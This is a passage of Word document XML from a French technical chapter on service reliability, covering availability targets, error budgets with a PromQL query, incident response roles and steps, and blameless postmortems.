        <w:t>sum(rate(http_requests_total{route="/panier"}[5m]))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.324 — Quatre objectifs et leurs coûts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31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Objectif</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="347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Indisponibilité mensuelle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Redondance nécessaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2318"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>99 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3477"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>7 h 12</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Simple</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="231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99,9 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="347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43 min</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Multi-zone</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2318"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>99,95 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3477"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>22 min</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Bascule automatique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="231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99,99 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="347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4 min</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Multi-région</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>84.3 Utiliser le budget</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le budget d'erreur est un outil de décision, pas une statistique décorative. Tant qu'il reste du budget, on peut livrer plus vite ; quand il est épuisé, la fiabilité passe avant les fonctionnalités.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.325 — Quatre états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7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État du budget</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Décision</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Conséquence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2774"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>&gt; 50 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Livraisons normales</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Rythme habituel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="277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20 à 50 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Vigilance</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Revue des changements risqués</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2774"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>&lt; 20 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3190"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Ralentissement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3051"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Priorité aux corrections</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="277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Épuisé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Gel des fonctionnalités</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Travail de fiabilité uniquement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux mesures · promql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Consommation du budget sur 30 jours</w:t>
        <w:br/>
        <w:t>1 - (</w:t>
        <w:br/>
        <w:t xml:space="preserve">  sum(increase(http_requests_total{status!~"5.."}[30d]))</w:t>
        <w:br/>
        <w:t xml:space="preserve">  /</w:t>
        <w:br/>
        <w:t xml:space="preserve">  sum(increase(http_requests_total[30d]))</w:t>
        <w:br/>
        <w:t>)</w:t>
        <w:br/>
        <w:br/>
        <w:t># Alerte quand il reste moins de 20 %</w:t>
        <w:br/>
        <w:t># (à exprimer sur la fenêtre glissante de l'objectif)</w:t>
      </w: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UN BUDGET QUI N'A JAMAIS ÉTÉ CONSOMMÉ EST MAL CALIBRÉ</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Si l'objectif est atteint chaque mois avec une marge énorme, il est trop prudent : l'équipe investit dans une fiabilité que personne ne remarque. Un objectif utile est atteint avec quelques incidents évités de justesse.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>84.4 Répondre à un incident</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La réponse à incident est un rôle, pas une improvisation. La personne qui coordonne ne répare pas : elle organise, décide et communique.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.326 — Quatre rôles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4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313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Responsabilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="313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Ne fait pas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2743"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Commandant d'incident</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3135"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Coordonner et décider</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3135"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Le diagnostic technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="274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Enquêteur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="313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Diagnostiquer et corriger</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="313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La communication externe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2743"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Scribe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3135"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Chronologie et décisions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3135"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Les manipulations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="274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Communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="313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Informer les parties</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="313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Les modifications système</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pP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b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Déclarer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : ouvrir un canal dédié et nommer un commandant.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b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Évaluer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : mesurer l'impact utilisateur et la sévérité.</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b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Contenir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : stabiliser, quitte à dégrader une fonctionnalité.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:pos="425" w:val="left"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="60" w:line="348" w:lineRule="exact"/>
        <w:ind w:left="425" w:hanging="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>4.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Informer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : donner une heure de prochaine mise à jour.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:pos="425" w:val="left"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="60" w:line="348" w:lineRule="exact"/>
        <w:ind w:left="425" w:hanging="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>5.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Corriger</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : appliquer le correctif le plus sûr, pas le plus élégant.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:pos="425" w:val="left"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="60" w:line="348" w:lineRule="exact"/>
        <w:ind w:left="425" w:hanging="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>6.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Clore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : vérifier le retour à la normale et planifier l'analyse.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une communication utile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Modèle de mise à jour, toutes les 30 minutes</w:t>
        <w:br/>
        <w:t>[14:35] Incident INC-2026-041 — service de paiement</w:t>
        <w:br/>
        <w:t>Impact : 12 % des paiements refusés depuis 14:12.</w:t>
        <w:br/>
        <w:t>Cause probable : expiration d'un certificat interne.</w:t>
        <w:br/>
        <w:t>Action en cours : bascule sur le certificat de secours.</w:t>
        <w:br/>
        <w:t>Prochaine mise à jour : 15:05.</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NE JAMAIS REDÉMARRER SANS COMPRENDRE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Un redémarrage qui « résout » le problème efface les preuves. Il est parfois nécessaire pour rétablir le service, mais il doit être consigné et suivi d'une analyse sur les données conservées.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>84.5 Analyser sans reproche</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une analyse sans reproche cherche les causes systémiques : qu'est-ce qui a rendu l'erreur possible, indétectable ou coûteuse ? Elle produit des actions vérifiables, pas des promesses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.327 — Cinq questions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91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Question</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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Objectif</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="318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Exemple de réponse</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2916"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Que s'est-il passé ?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2916"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
